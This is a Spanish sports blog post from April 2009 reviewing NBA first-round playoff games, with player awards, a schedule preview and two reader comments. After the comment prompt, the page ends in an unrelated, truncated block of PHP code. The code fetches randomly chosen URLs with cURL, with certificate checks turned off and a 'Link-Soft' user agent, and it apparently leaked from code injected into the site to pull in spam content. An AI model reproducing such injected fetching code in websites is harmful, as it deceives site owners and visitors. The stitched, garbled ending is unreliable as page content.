Playoffs (27/04/2009): Día de pájaras

28 de April de 2009 por TheDeerHunter

Baño de agua fría para todos y es que pasamos de un extremo a otro en cuestión de horas. De la máxima emoción y calidad baloncestística al tedio, las imprecisiones y el ridículo. Esto es producto de la máxima exigencia psicológica y física que sufren los jugadores. Nadie te ayuda allí abajo. Estás sólo bajo los focos.

Hace apenas dos días hablábamos del ambiente en New Orleans, de la reacción de uno de los grandes de esta temporada y la anterior. Anoche se llevaron uno de los dos más severos correctivos de la historia. Es difícil creer que los Denver de Karl, los antiguos “Three Amigos“, han sido el equipo capaz de vaciar de camisetas amarillas el pabellón y de secar a Chris Paul en una humillación que bien podría costar la cabeza al mejor entrenador de la pasada campaña.

Los Hornets están heridos de muerte. Es imposible pensar que pueden recuperarse para el próximo partido. Estaban cogidos por los pelos y han terminado rebentando por todos lados, en defensa y en ataque. Curiosamente sólo Posey mantuvo ayer el cuerpo en la línea mediocre de toda la temporada. Mirar la estadística es como mirar un cuadro del Bosco representando los infiernos. Ninguna conclusión podemos ni debemos extraer de un “gazpacho” como éste. Nada ha funcionado y punto y los Nuggets no han dejado prisioneros. Bien por ellos.

Tampoco esperábamos el horripilante partido de Miami, tras el festín que se dieron el otro día. Los Hawks salieron muy metidos y en esta ocasión sí lograron darle la noche a Wade. Su defensa muy buena y el ritmo muy controlado. Sólo Jermaine y James Jones lograron escapar un poco a la presión, pero al resto los aburrieron y de Beasley mejor ni hablamos. Destacar también el gran partido de Pachulia, con 18 rebotes. El georgiano se convirtió en el pilar de un equipo que, ofensivamente, tampoco hizo nada del otro jueves. Partido flojito… Desgracidamente no podemos tener un Bulls-Celtics todos los días.

Finalmente los Lakers, como era de esperar, cerraron su eliminatoria como sólo ellos saben hacerlo. Al tran tran y aburriendo hasta a los monos. Sin embargo los que también estaban aburridos anoche eran Deron y Boozer que han terminado claudicando. Gran Odom, bien Kobe y bien Millsap. Poco más podemos destacar de otra eliminatoria que apenas se ha disputado.

PREMIOS

MVP: No es muy habitual que Lamar Odom sea el mejor jugador de los Lakers, pero ayer se hizo absolutamente merecedor del galardón con sus 26 puntos, 15 rebotes y 4 asistencias. Si jugara siempre así otro gallo le cantaría.

Rookie: Ayer sólo saltó a la cancha Mario Chalmers y no estuvo especialmente acertado con el mismo número de puntos (4) que de pérdidas. Mejor lo dejamos desierto.

Sorpresa: Casi no hemos hablado de él durante esta temporada pero sigue trabajando en la sombra cuajando de vez en cuando grandes actuaciones. Hablamos de Zaza Pachulia, autor ayer de 12 puntos y 18 rebotes. Su actitud luchadora contagió al resto del equipo.

Decepción: New Orleans Hornets y como decía el gran filósofo Bern Schuster: “No hace falta decir nada más”. Mención para el banquillo de los Heat, incapaz de anotar una sola canasta en juego.

Esfuerzo en vano: Si Miami pierde, Wade suele ganar este premio, pero ayer estuvo bastante errático en el tiro así que mejor se lo otorgamos a un renacido Jermaine O’Neal que aportó 20 puntos y 6 rebotes.

RAZONES PARA TRASNOCHAR

Se presenta una noche de emociones fuertes con 2 capítulos más de las eliminatorias más igualadas de esta primera ronda y 2 match points.

– Chicago @ Boston (1.00h): Por favor, que no se acabe nunca esta eliminatoria. Boston se sigue sobreponiendo a las adversidades en forma de lesiones y Chicago mantiene toda la ilusión y la intensidad necesarias para poner en auténticos problemas a los campeones.

– Philadelphia @ Orlando (1.30h): Vuelve la eliminatoria a Orlando lo que debería ser la oportunidad definitiva para que Howard y compañía den un golpe de autoridad y espanten los fantasmas. En todo caso, los “André” seguro que tienen otros planes.

– Dallas @ San Antonio (3.30h): ¿Irá Dallas a por el partido o lo dejará para cuando vuelvan a su pabellón? En todo caso, la fuerza mental y convicción de los Spurs no pondrá fácil su eliminación.

– Houston @ Portland (4.00h): Última oportunidad de redención de McMillan y los suyos. Puede volver a estrellarse contra la misma pared o puede cambiar alguna parte de su plan original en busca de la victoria. Se aceptan apuestas de lo que pasará

Comenta

2 comentarios a esta entrada

  1. ÑBA dice:
    #1

    Se presenta una madrugada más que emocionante, con guisos para todos los gustos…

      Citar

  2. Angel dice:
    #2

    Umm, a ver si hay suerte y puedo ver el Portland Rockets en el AVE (aunque con esa hora no se mi podré grabarlo).

    Lo de Hornets, creo que pocos lo esperábamos, vale que no pasen de ronda,pero hacer un ridículo tan espantoso como el de ayer no es de recibo…

    Un saludo!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>